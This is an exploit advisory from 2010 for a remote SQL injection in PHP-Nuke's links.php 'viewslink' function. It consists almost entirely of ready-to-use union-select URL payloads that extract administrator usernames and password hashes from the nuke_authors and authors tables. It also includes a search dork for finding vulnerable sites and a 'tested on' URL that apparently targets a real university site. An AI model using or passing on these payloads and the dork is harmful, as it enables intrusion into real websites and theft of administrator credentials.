# Exploit Title: [PHP-NUKE viewslink Remote SQL Injection]


# Date: [05.05.2010]


# Author: CMD

# Contact: cemede@ilkposta.com


# Version: [PHP Nuke 5.0 and other version]

# Dork: [allinurl: op=viewslink&sid=]
=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=


# Tested on: 
[http://www.eee.deu.edu.tr/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*]


=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=

# Code :

[

Exploit 1: 
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

           
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*



Exploit 2: 
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/authors/**/where/**/radminsuper=1/*

        
/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/authors/**/where/**/radminsuper=1/*

]



=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=

# Example : 

[

Example 1 : 
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*

            
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*



Example 2 : 
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,pwd/**/from/**/authors/**/where/**/radminsuper=1/*

            
http://www.target.com/links.php?op=viewslink&sid=-1/**/union/**/select/**/0,aid/**/from/**/authors/**/where/**/radminsuper=1/*

]

=-==-==-==-==-==-==-==C==M==D==-==-==-==-==-==-==-==-==-==-==-=

#Thanx : AmeN & MUS4LLAT & Snaritx & JacKal & Metrp0l 
& Ve sayamadıklarım

#Says : Hemşo bak bug buldum xD



 		 	   		  
_________________________________________________________________
Yeni Windows 7: Size en uygun bilgisayarı bulun. Daha fazla bilgi edinin.
http://windows.microsoft.com/shop